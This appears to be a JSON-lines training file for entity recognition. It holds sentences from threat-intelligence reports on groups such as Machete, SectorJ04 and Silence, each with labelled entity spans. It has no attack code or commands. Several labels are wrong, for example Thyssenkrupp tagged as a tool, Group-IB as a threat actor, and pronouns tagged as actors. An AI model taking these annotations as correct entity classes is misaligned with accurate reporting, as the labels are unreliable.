"dnrti_train_003208", "source": "dnrti_train"}} {"text": "LYCEUM is an emerging threat to energy organizations in the Middle East , but organizations should not assume that future targeting will be limited to this sector .", "spans": {"THREAT_ACTOR: LYCEUM": [[0, 6]]}, "info": {"id": 
"dnrti_train_003209", "source": "dnrti_train"}} {"text": "Aside from deploying novel malware , LYCEUM’s activity demonstrates capabilities CTU researchers have observed from other threat groups and reinforces the value of a few key controls .", "spans": {"THREAT_ACTOR: LYCEUM’s": [[37, 45]], "ORGANIZATION: CTU": [[81, 84]]}, "info": {"id": "dnrti_train_003210", "source": "dnrti_train"}} {"text": "Password spraying , DNS tunneling , social engineering , and abuse of security testing frameworks are common tactics , particularly from threat groups operating in the Middle East .", "spans": {"THREAT_ACTOR: groups": [[144, 150]]}, "info": {"id": "dnrti_train_003211", "source": "dnrti_train"}} {"text": "Machete is still very active at the time of this publication , regularly introducing changes to its malware , infrastructure and spearphishing campaigns .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]], "TOOL: malware": [[100, 107]]}, "info": {"id": "dnrti_train_003213", "source": "dnrti_train"}} {"text": "ESET has been tracking a new version of Machete (the group’s Python-based toolset) that was first seen in April 2018 .", "spans": {"ORGANIZATION: ESET": [[0, 4]], "THREAT_ACTOR: Machete": [[40, 47]]}, "info": {"id": "dnrti_train_003214", "source": "dnrti_train"}} {"text": "This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted with the Machete malware .", "spans": {"THREAT_ACTOR: Machete": [[132, 139]]}, "info": {"id": "dnrti_train_003215", "source": "dnrti_train"}} {"text": "Their long run of attacks , focused on Latin American countries , has allowed them to collect intelligence and refine their tactics over the years .", "spans": {"THREAT_ACTOR: Their": [[0, 5]]}, "info": {"id": "dnrti_train_003216", "source": "dnrti_train"}} {"text": "Machete is interested in files that describe navigation routes and positioning using military grids .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": 
"dnrti_train_003217", "source": "dnrti_train"}} {"text": "The Machete group sends very specific emails directly to its victims , and these change from target to target .", "spans": {"THREAT_ACTOR: Machete": [[4, 11]]}, "info": {"id": "dnrti_train_003218", "source": "dnrti_train"}} {"text": "The Machete group is very active and has introduced several changes to its malware since a new version was released in April 2018 .", "spans": {"THREAT_ACTOR: Machete": [[4, 11]]}, "info": {"id": "dnrti_train_003219", "source": "dnrti_train"}} {"text": "Since August 2018 , the Machete components have been delivered with an extra layer of obfuscation .", "spans": {"THREAT_ACTOR: Machete": [[24, 31]]}, "info": {"id": "dnrti_train_003221", "source": "dnrti_train"}} {"text": "ESET has been tracking this threat for months and has observed several changes , sometimes within weeks .", "spans": {"ORGANIZATION: ESET": [[0, 4]]}, "info": {"id": "dnrti_train_003223", "source": "dnrti_train"}} {"text": "The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain .", "spans": {"THREAT_ACTOR: Machete": [[134, 141]], "ORGANIZATION: we": [[218, 220]]}, "info": {"id": "dnrti_train_003225", "source": "dnrti_train"}} {"text": "This group is very active and continues to develop new features for its malware , and implement infrastructure changes in 2019 .", "spans": {"THREAT_ACTOR: group": [[5, 10]]}, "info": {"id": "dnrti_train_003226", "source": "dnrti_train"}} {"text": "Machete's long run of attacks , focused in Latin American countries , has allowed them to collect intelligence and refine their tactics over the years .", "spans": {"THREAT_ACTOR: Machete's": [[0, 9]]}, "info": {"id": "dnrti_train_003227", "source": "dnrti_train"}} {"text": "ESET researchers have detected an ongoing , highly targeted campaign , with a 
majority of the targets being military organizations .", "spans": {"ORGANIZATION: ESET": [[0, 4]]}, "info": {"id": "dnrti_train_003228", "source": "dnrti_train"}} {"text": "The group behind Machete uses effective spearphishing techniques .", "spans": {"THREAT_ACTOR: Machete": [[17, 24]]}, "info": {"id": "dnrti_train_003229", "source": "dnrti_train"}} {"text": "First described by Kaspersky in 2014 [1] and later , by Cylance in 2017 [2] , Machete is a piece of malware found to be targeting high profile individuals and organizations in Latin American countries .", "spans": {"ORGANIZATION: Kaspersky": [[19, 28]], "ORGANIZATION: Cylance": [[56, 63]], "THREAT_ACTOR: Machete": [[78, 85]]}, "info": {"id": "dnrti_train_003230", "source": "dnrti_train"}} {"text": "In 2018 Machete reappeared with new code and new features .", "spans": {"THREAT_ACTOR: Machete": [[8, 15]]}, "info": {"id": "dnrti_train_003231", "source": "dnrti_train"}} {"text": "As of June 2019 , ESET has seen over 50 victims being actively spied upon by Machete , with more than half of them being computers belonging to the Venezuelan military forces .", "spans": {"ORGANIZATION: ESET": [[18, 22]], "THREAT_ACTOR: Machete": [[77, 84]]}, "info": {"id": "dnrti_train_003232", "source": "dnrti_train"}} {"text": "Machete has Latin American targets and has been developed by a Spanish-speaking group , presumably from a LATAM country .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]], "THREAT_ACTOR: group": [[80, 85]]}, "info": {"id": "dnrti_train_003233", "source": "dnrti_train"}} {"text": "Machete was active and constantly working on very effective spearphishing campaigns .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003234", "source": "dnrti_train"}} {"text": "In some cases , Machete trick new victims by sending real documents that had been stolen on the very same day .", "spans": {"THREAT_ACTOR: Machete": [[16, 23]]}, "info": {"id": "dnrti_train_003235", "source": "dnrti_train"}} {"text": 
"Machete relies on spearphishing to compromise its targets .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003236", "source": "dnrti_train"}} {"text": "Attackers take advantage of that , along with their knowledge of military jargon and etiquette , to craft very convincing phishing emails .", "spans": {"THREAT_ACTOR: Attackers": [[0, 9]]}, "info": {"id": "dnrti_train_003238", "source": "dnrti_train"}} {"text": "Operators behind Machete apparently already have information about individuals or organizations of interest to them in Latin America , how to reach them , and how best to trick them into getting compromised .", "spans": {"THREAT_ACTOR: Machete": [[17, 24]]}, "info": {"id": "dnrti_train_003239", "source": "dnrti_train"}} {"text": "Since the end of March up until the end of May 2019 , ESET observed that there were more than 50 victimized computers actively communicating with the C&C server .", "spans": {"ORGANIZATION: ESET": [[54, 58]]}, "info": {"id": "dnrti_train_003240", "source": "dnrti_train"}} {"text": "This extends to other countries in Latin America , with the Ecuadorean military being another organization highly targeted by Machete .", "spans": {"THREAT_ACTOR: Machete": [[126, 133]]}, "info": {"id": "dnrti_train_003241", "source": "dnrti_train"}} {"text": "Machete is malware that has been developed and is actively maintained by a Spanish-speaking group .", "spans": {"THREAT_ACTOR: Machete": [[0, 7]]}, "info": {"id": "dnrti_train_003242", "source": "dnrti_train"}} {"text": "Since it was active in 2012 , it has been carrying out attacks against sensitive targets in China and is one of the most active APT attack organizations targeting mainland China in recent years .", "spans": {"ORGANIZATION: organizations": [[139, 152]]}, "info": {"id": "dnrti_train_003243", "source": "dnrti_train"}} {"text": "By introducing small changes to their code and infrastructure , the group has bypassed several security products .", "spans": 
{"THREAT_ACTOR: group": [[68, 73]]}, "info": {"id": "dnrti_train_003244", "source": "dnrti_train"}} {"text": "OceanLotus will release malicious sub-packages in the background , receive the remote control command , steal the privacy information of users such as SMS messages , contacts , call records , geographic locations , and browser records .", "spans": {"THREAT_ACTOR: OceanLotus": [[0, 10]]}, "info": {"id": "dnrti_train_003245", "source": "dnrti_train"}} {"text": "It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks .", "spans": {"THREAT_ACTOR: HackingTeam": [[60, 71]]}, "info": {"id": "dnrti_train_003247", "source": "dnrti_train"}} {"text": "This report includes details related to the major hacking targets of the SectorJ04 group in 2019 , how those targets were hacked , characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking .", "spans": {"ORGANIZATION: report": [[5, 11]], "THREAT_ACTOR: SectorJ04": [[73, 82], [209, 218]]}, "info": {"id": "dnrti_train_003248", "source": "dnrti_train"}} {"text": "In 2019 , the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia , and is changing the pattern of their attacks from targeted attacks to searching for random victims .", "spans": {"THREAT_ACTOR: SectorJ04": [[14, 23]]}, "info": {"id": "dnrti_train_003249", "source": "dnrti_train"}} {"text": "The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003250", "source": 
"dnrti_train"}} {"text": "There was a significant increase in SectorJ04's hacking activities in 2019 , especially those targeting South Korea .", "spans": {"THREAT_ACTOR: SectorJ04's": [[36, 47]]}, "info": {"id": "dnrti_train_003251", "source": "dnrti_train"}} {"text": "They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server .", "spans": {"THREAT_ACTOR: attacker’s": [[126, 136]]}, "info": {"id": "dnrti_train_003252", "source": "dnrti_train"}} {"text": "We saw SectorJ04 group activity in Germany , Indonesia , the United States , Taiwan , India .", "spans": {"THREAT_ACTOR: SectorJ04": [[7, 16]]}, "info": {"id": "dnrti_train_003253", "source": "dnrti_train"}} {"text": "The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe , or general companies such as retail and manufacturing , but they recently expanded their areas of activity to include the medical , pharmaceutical , media , energy and manufacturing industries .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003255", "source": "dnrti_train"}} {"text": "The SectorJ04 group mainly used their own backdoor , ServHelper and FlawedAmmy RAT , for hacking .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]], "TOOL: ServHelper": [[53, 63]], "TOOL: FlawedAmmy RAT": [[68, 82]]}, "info": {"id": "dnrti_train_003256", "source": "dnrti_train"}} {"text": "SectorJ04 also used the Remote Manipulator System (RMS) RAT , a legitimate remote management software created in Russia .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "TOOL: Remote Manipulator System": [[24, 49]]}, "info": {"id": "dnrti_train_003257", "source": "dnrti_train"}} {"text": "Backdoors are installed in infected systems and SectorJ04 also distributed email stealers , botnet malware and ransomware through those backdoors .", "spans": {"THREAT_ACTOR: SectorJ04": [[48, 57]], "TOOL: 
backdoors": [[136, 145]]}, "info": {"id": "dnrti_train_003258", "source": "dnrti_train"}} {"text": "SectorJ04 was recently confirmed to use additional backdoor called AdroMut and FlowerPippi , which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file , or to collect system information and send it to the attacker’s server .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]], "TOOL: AdroMut": [[67, 74]], "TOOL: FlowerPippi": [[79, 90]], "THREAT_ACTOR: attacker’s": [[236, 246]]}, "info": {"id": "dnrti_train_003260", "source": "dnrti_train"}} {"text": "Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia .", "spans": {"THREAT_ACTOR: SectorJ04": [[13, 22]]}, "info": {"id": "dnrti_train_003261", "source": "dnrti_train"}} {"text": "A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04 .", "spans": {"TOOL: AdroMut": [[30, 37]], "TOOL: FlowerPippi": [[63, 74]], "THREAT_ACTOR: SectorJ04": [[102, 111]]}, "info": {"id": "dnrti_train_003263", "source": "dnrti_train"}} {"text": "But after 2019 SectorJ04 has changed its hacking strategy to attack using spam email .", "spans": {"THREAT_ACTOR: SectorJ04": [[15, 24]]}, "info": {"id": "dnrti_train_003264", "source": "dnrti_train"}} {"text": "The hacking activities of SectorJ04 group , which targeted South Korea in the first half of 2019 , have been continuously discovered .", "spans": {"THREAT_ACTOR: SectorJ04": [[26, 35]]}, "info": {"id": "dnrti_train_003265", "source": "dnrti_train"}} {"text": "Prior to 2019 , the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware , such as Locky and GlobeImporter , along with its banking Trojan , on its victims computers .", "spans": {"THREAT_ACTOR: SectorJ04": [[20, 29]], "TOOL: exploit kits": 
[[102, 114]], "TOOL: Locky": [[159, 164]], "TOOL: GlobeImporter": [[169, 182]], "TOOL: banking Trojan": [[200, 214]]}, "info": {"id": "dnrti_train_003266", "source": "dnrti_train"}} {"text": "In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards .", "spans": {"THREAT_ACTOR: SectorJ04's": [[26, 37]]}, "info": {"id": "dnrti_train_003267", "source": "dnrti_train"}} {"text": "The SectorJ04 group has carried out large-scale hacking activities targeting South Korea , while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003268", "source": "dnrti_train"}} {"text": "In June , SectorJ04 group conducted hacking using spam emails written in various languages , including English , Arabic , Korean and Italian , and the emails were written with various contents , including remittance card , invoice and tax invoice .", "spans": {"THREAT_ACTOR: SectorJ04": [[10, 19]]}, "info": {"id": "dnrti_train_003269", "source": "dnrti_train"}} {"text": "Spam emails and attachments written in Chinese were found in May , and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications , international schools and manufacturing .", "spans": {"THREAT_ACTOR: SectorJ04": [[75, 84]]}, "info": {"id": "dnrti_train_003270", "source": "dnrti_train"}} {"text": "In addition to their preexist backdoor , ServHelper and FlawedAmmy , they have also been confirmed to use the backdoor called AdroMut and FlowerPippi .", "spans": {"TOOL: ServHelper": [[41, 51]], "TOOL: FlawedAmmy": [[56, 66]], "TOOL: AdroMut": [[126, 133]], "TOOL: FlowerPippi": [[138, 149]]}, "info": {"id": "dnrti_train_003271", "source": "dnrti_train"}} {"text": "AdroMut downloads the malware ServHelper and FlawedAmmy RAT 
used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor .", "spans": {"TOOL: ServHelper": [[30, 40]], "TOOL: FlawedAmmy": [[45, 55]], "THREAT_ACTOR: SectorJ04": [[72, 81]]}, "info": {"id": "dnrti_train_003272", "source": "dnrti_train"}} {"text": "The SectorJ04 group , which has been utilizing the same pattern of infection and the same malware for more than six months , is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files , changing their spam email format and using new types of backdoor .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003273", "source": "dnrti_train"}} {"text": "Until 2019 , SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit , and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[13, 22]], "TOOL: ransomware": [[106, 116]], "TOOL: banking trojans": [[121, 136]]}, "info": {"id": "dnrti_train_003274", "source": "dnrti_train"}} {"text": "The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam .", "spans": {"THREAT_ACTOR: SectorJ04": [[4, 13]]}, "info": {"id": "dnrti_train_003275", "source": "dnrti_train"}} {"text": "This allows them to expand their range of targets of hacking activities for financial profit , and in this regard , SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[116, 125]], "ORGANIZATION: companies": [[287, 296]]}, "info": {"id": 
"dnrti_train_003276", "source": "dnrti_train"}} {"text": "SectorJ04 group carried out intensive hacking on various industrial sectors , including South Korea’s media , manufacturing and universities , around February and March 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003277", "source": "dnrti_train"}} {"text": "SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003279", "source": "dnrti_train"}} {"text": "SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019 .", "spans": {"THREAT_ACTOR: SectorJ04": [[0, 9]]}, "info": {"id": "dnrti_train_003280", "source": "dnrti_train"}} {"text": "In late July , SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education , job openings , real estate and semiconductors in South Korea .", "spans": {"THREAT_ACTOR: SectorJ04": [[15, 24]]}, "info": {"id": "dnrti_train_003281", "source": "dnrti_train"}} {"text": "In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong .", "spans": {"THREAT_ACTOR: SectorJ04": [[22, 31]]}, "info": {"id": "dnrti_train_003282", "source": "dnrti_train"}} {"text": "Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity .", "spans": {}, "info": {"id": "dnrti_train_003283", "source": "dnrti_train"}} {"text": "They are one of the most active cyber crime groups in 2019 , and they often modify and tweak their hacking methods and perform periodic hacking activities .", "spans": {"THREAT_ACTOR: groups": [[44, 50]]}, "info": 
{"id": "dnrti_train_003284", "source": "dnrti_train"}} {"text": "Now , Silence is one of the most active threat actors targeting the financial sector .", "spans": {"THREAT_ACTOR: Silence": [[6, 13]]}, "info": {"id": "dnrti_train_003285", "source": "dnrti_train"}} {"text": "Since we released our original report , Silence: Moving into the darkside , the confirmed damage from Silence's operations has increased fivefold compared to the figures in Group-IB's initial report .", "spans": {"THREAT_ACTOR: Silence:": [[40, 48]], "ORGANIZATION: Group-IB's": [[173, 183]]}, "info": {"id": "dnrti_train_003286", "source": "dnrti_train"}} {"text": "Silence started by targeting organizations in Russia , gradually shifting their focus to former Soviet countries , and then the world .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003287", "source": "dnrti_train"}} {"text": "Silence also started using Ivoke , a fileless loader , and EDA agent , both written in PowerShell .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]], "TOOL: Ivoke": [[27, 32]], "TOOL: EDA agent": [[59, 68]]}, "info": {"id": "dnrti_train_003288", "source": "dnrti_train"}} {"text": "Silence 2.0: Going Global is an extension of our original report: Silence: Moving into the Darkside which remains the most significant contribution to the research on the group and is the first such report to reveal Silence’s activity .", "spans": {"ORGANIZATION: Going Global": [[13, 25]], "THREAT_ACTOR: group": [[171, 176]], "THREAT_ACTOR: Silence’s activity": [[216, 234]]}, "info": {"id": "dnrti_train_003289", "source": "dnrti_train"}} {"text": "Since the report’s release in September 2018 , Group-IB’s Threat Intelligence team has detected 16 campaigns targeting banks launched by Silence .", "spans": {"ORGANIZATION: Group-IB’s": [[47, 57]], "ORGANIZATION: banks": [[119, 124]], "THREAT_ACTOR: Silence": [[137, 144]]}, "info": {"id": "dnrti_train_003290", "source": "dnrti_train"}} {"text": "Like the majority of 
APT groups , Silence uses phishing as their infection vector .", "spans": {"THREAT_ACTOR: Silence": [[34, 41]]}, "info": {"id": "dnrti_train_003291", "source": "dnrti_train"}} {"text": "In the last successful attack described in Silence: Moving into the darkside , dated April 2018 , the hackers siphoned off about $150 , 000 through ATMs in a single night .", "spans": {"THREAT_ACTOR: hackers": [[102, 109]]}, "info": {"id": "dnrti_train_003292", "source": "dnrti_train"}} {"text": "Prior to April 2018 , as described in Group-IB’s Silence: Moving into the darkside report , Silence’s target interests were primarily limited to former Soviet and Eastern European countries including Russia , Ukraine , Belarus , Azerbaijan , Poland , and Kazakhstan .", "spans": {"THREAT_ACTOR: Group-IB’s": [[38, 48]]}, "info": {"id": "dnrti_train_003293", "source": "dnrti_train"}} {"text": "In 2018 , Silence conducted test campaigns to update their database of current targets and expand their attack geography .", "spans": {"THREAT_ACTOR: Silence": [[10, 17]]}, "info": {"id": "dnrti_train_003294", "source": "dnrti_train"}} {"text": "Silence has conducted at least three campaigns using recon emails , followed by malicious mail sent to an updated recipient list .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003296", "source": "dnrti_train"}} {"text": "Since our last public report , Silence has sent out more than 170 , 000 recon emails to banks in Russia , the former Soviet Union , Asia and Europe .", "spans": {"THREAT_ACTOR: Silence": [[31, 38]]}, "info": {"id": "dnrti_train_003298", "source": "dnrti_train"}} {"text": "In November 2018 , Silence tried their hand at targeting the Asian market for the first time in their history .", "spans": {"THREAT_ACTOR: Silence": [[19, 26]]}, "info": {"id": "dnrti_train_003299", "source": "dnrti_train"}} {"text": "In total , Silence sent out about 80 , 000 emails , with more than half of them targeting Taiwan , Malaysia , and 
South Korea .", "spans": {"THREAT_ACTOR: Silence": [[11, 18]]}, "info": {"id": "dnrti_train_003300", "source": "dnrti_train"}} {"text": "From 16 October 2018 to 1 January 2019 , Silence sent out about 84 , 000 emails in Russia alone to update their address database .", "spans": {"THREAT_ACTOR: Silence": [[41, 48]]}, "info": {"id": "dnrti_train_003302", "source": "dnrti_train"}} {"text": "As part of their phishing campaigns , silence still uses Microsoft Office documents with macros or exploits , CHM files , and .LNK shortcuts as malicious attachments .", "spans": {"THREAT_ACTOR: silence": [[38, 45]]}, "info": {"id": "dnrti_train_003303", "source": "dnrti_train"}} {"text": "In the former Soviet Union , Silence targeted banks in Kyrgyzstan , Kazakhstan , and Ukraine .", "spans": {"THREAT_ACTOR: Silence": [[29, 36]]}, "info": {"id": "dnrti_train_003304", "source": "dnrti_train"}} {"text": "As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": {"THREAT_ACTOR: Silence": [[20, 27]], "TOOL: CnC-3 server": [[32, 44]]}, "info": {"id": "dnrti_train_003307", "source": "dnrti_train"}} {"text": "To control ATMs , the group uses the Atmosphere Trojan , which is unique to Silence , or a program called xfs-disp.exe .", "spans": {"THREAT_ACTOR: group": [[22, 27]], "TOOL: Atmosphere Trojan": [[37, 54]], "THREAT_ACTOR: Silence": [[76, 83]], "TOOL: xfs-disp.exe": [[106, 118]]}, "info": {"id": "dnrti_train_003308", "source": "dnrti_train"}} {"text": "In addition , Silence downloads the reverse proxy programs Silence.ProxyBot and Silence. ProxyBot.NET , which are described in detail in the report Silence: moving into the darkside .", "spans": {"THREAT_ACTOR: Silence": [[14, 21]], "TOOL: Silence.ProxyBot": [[59, 75]], "TOOL: Silence. 
ProxyBot.NET": [[80, 101]]}, "info": {"id": "dnrti_train_003309", "source": "dnrti_train"}} {"text": "Analysis of the emails has shown that the attachment contains an exploit for the CVE-2017-11882 vulnerability .", "spans": {"VULNERABILITY: exploit": [[65, 72]], "VULNERABILITY: CVE-2017-11882 vulnerability": [[81, 109]]}, "info": {"id": "dnrti_train_003310", "source": "dnrti_train"}} {"text": "Silence sent out emails to Russian banks .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003312", "source": "dnrti_train"}} {"text": "Silence conducted a massive phishing campaign posing as the Central Bank of the Russian Federation .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003314", "source": "dnrti_train"}} {"text": "Silence attacked financial organisations in the UK .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003316", "source": "dnrti_train"}} {"text": "Silence conducted the first stage of their Asian campaign , organising a massive phishing attack aimed at receiving an up-to-date list of current recipients in different countries for further targeted attacks delivering their malicious software .", "spans": {"THREAT_ACTOR: Silence": [[0, 7]]}, "info": {"id": "dnrti_train_003317", "source": "dnrti_train"}} {"text": "The attackers used the server deployed on 6 June 2019 to control compromised workstations in these banks .", "spans": {"THREAT_ACTOR: attackers": [[4, 13]]}, "info": {"id": "dnrti_train_003318", "source": "dnrti_train"}} {"text": "On October 18th , 2018 , the group sent out emails to British financial companies as part of their preparatory campaign .", "spans": {"THREAT_ACTOR: group": [[29, 34]]}, "info": {"id": "dnrti_train_003320", "source": "dnrti_train"}} {"text": "Group-IB experts established that the server 185.20.187.89 started functioning no later than 28 January 2019 .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_003321", 
"source": "dnrti_train"}} {"text": "According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months .", "spans": {"THREAT_ACTOR: Silence": [[43, 50]]}, "info": {"id": "dnrti_train_003322", "source": "dnrti_train"}} {"text": "As we described in Silence: Moving into the darkside report , Silence has experience with theft using compromised card processing systems .", "spans": {"THREAT_ACTOR: Silence:": [[19, 27]], "THREAT_ACTOR: Silence": [[62, 69]]}, "info": {"id": "dnrti_train_003324", "source": "dnrti_train"}} {"text": "In February 2019 , Russian media7 reported a Silence attack on IT Bank in the city of Omsk .", "spans": {}, "info": {"id": "dnrti_train_003325", "source": "dnrti_train"}} {"text": "On 16 January 2019 , Silence sent out phishing emails with malicious attachments disguised as invitations to the International Financial Forum iFin-2019 (see section ‘Attack timeline’) .", "spans": {"THREAT_ACTOR: Silence": [[21, 28]]}, "info": {"id": "dnrti_train_003326", "source": "dnrti_train"}} {"text": "Group-IB specialists determined that the email addresses of IT bank employees were among the recipients of these emails .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]], "ORGANIZATION: employees": [[68, 77]]}, "info": {"id": "dnrti_train_003327", "source": "dnrti_train"}} {"text": "Since at least 2011 , these hackers have been using malware to spy on corporate networks .", "spans": {"THREAT_ACTOR: hackers": [[28, 35]], "TOOL: malware": [[52, 59]]}, "info": {"id": "dnrti_train_003330", "source": "dnrti_train"}} {"text": "Hackers are targeting high-tech companies as well as chemical and pharmaceutical companies .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_003331", "source": "dnrti_train"}} {"text": "The corporation conrms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary 
precautions.” Henkel claims that a “very small portion” of its worldwide IT systems had been affected — the systems in Germany .", "spans": {"THREAT_ACTOR: Winnti": [[27, 33]]}, "info": {"id": "dnrti_train_003333", "source": "dnrti_train"}} {"text": "A BASF spokeswoman tells us in an email that in July 2015 , hackers had successfully overcome the “first levels” of defense .", "spans": {"THREAT_ACTOR: hackers": [[60, 67]]}, "info": {"id": "dnrti_train_003334", "source": "dnrti_train"}} {"text": "The tool was written by staff of Thyssenkrupp , because the industrial giant—company number eleven—had been spied on by Winnti .", "spans": {"TOOL: Thyssenkrupp": [[33, 45]], "THREAT_ACTOR: Winnti": [[120, 126]]}, "info": {"id": "dnrti_train_003335", "source": "dnrti_train"}} {"text": "Hackers are charged with spying on a manufacturer of gas turbines .", "spans": {"THREAT_ACTOR: Hackers": [[0, 7]]}, "info": {"id": "dnrti_train_003336", "source": "dnrti_train"}} {"text": "The Hong Kong government was spied on by the Winnti hackers .", "spans": {"THREAT_ACTOR: Winnti": [[45, 51]]}, "info": {"id": "dnrti_train_003337", "source": "dnrti_train"}} {"text": "Komplex is a backdoor that has been used by APT28 on OS X and appears to be developed in a similar manner to XAgentOSX .", "spans": {"TOOL: Komplex": [[0, 7]], "THREAT_ACTOR: APT28": [[44, 49]]}, "info": {"id": "dnrti_train_003338", "source": "dnrti_train"}} {"text": "While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"THREAT_ACTOR: OceanLotus’": [[6, 17]], "ORGANIZATION: activists": [[192, 201]], "ORGANIZATION: dissidents": [[208, 218]]}, "info": {"id": "dnrti_train_003339", "source": "dnrti_train"}}
{"text": "NewsBeef attacks against Saudi Arabian organizations and individuals (as well as targets in the European Union) are likely to continue .", "spans": {"THREAT_ACTOR: NewsBeef": [[0, 8]]}, "info": {"id": "dnrti_train_003340", "source": "dnrti_train"}} {"text": "Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the APT10 during the compromise and was able to attribute data that was placed into it as being owned by Visma .", "spans": {"ORGANIZATION: Rapid7": [[0, 6]], "THREAT_ACTOR: APT10": [[97, 102]]}, "info": {"id": "dnrti_train_003341", "source": "dnrti_train"}} {"text": "These RAT families are discussed in Novetta’s other report on the Lazarus Group’s RAT and Staging capabilities .", "spans": {"ORGANIZATION: Novetta’s": [[36, 45]], "THREAT_ACTOR: Lazarus": [[66, 73]]}, "info": {"id": "dnrti_train_003343", "source": "dnrti_train"}} {"text": "Magic Hound has primarily targeted organizations in the energy , government , and technology sectors that are either based or have business interests in Saudi Arabia .", "spans": {"THREAT_ACTOR: Magic Hound": [[0, 11]]}, "info": {"id": "dnrti_train_003344", "source": "dnrti_train"}} {"text": "Since at least 2013 , the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense , aerospace and petrochemical organizations .", "spans": {"THREAT_ACTOR: group": [[41, 46]], "ORGANIZATION: FireEye": [[52, 59]], "THREAT_ACTOR: APT33": [[70, 75]]}, "info": {"id": "dnrti_train_003345", "source": "dnrti_train"}} {"text": "CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: Mia Ash": [[178, 185]]}, "info": {"id": "dnrti_train_003346", "source": "dnrti_train"}} {"text": "CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering .", "spans": {"ORGANIZATION: CTU": [[0, 3]], "THREAT_ACTOR: COBALT GYPSY": [[30, 42]]}, "info": {"id": "dnrti_train_003347", "source": "dnrti_train"}}
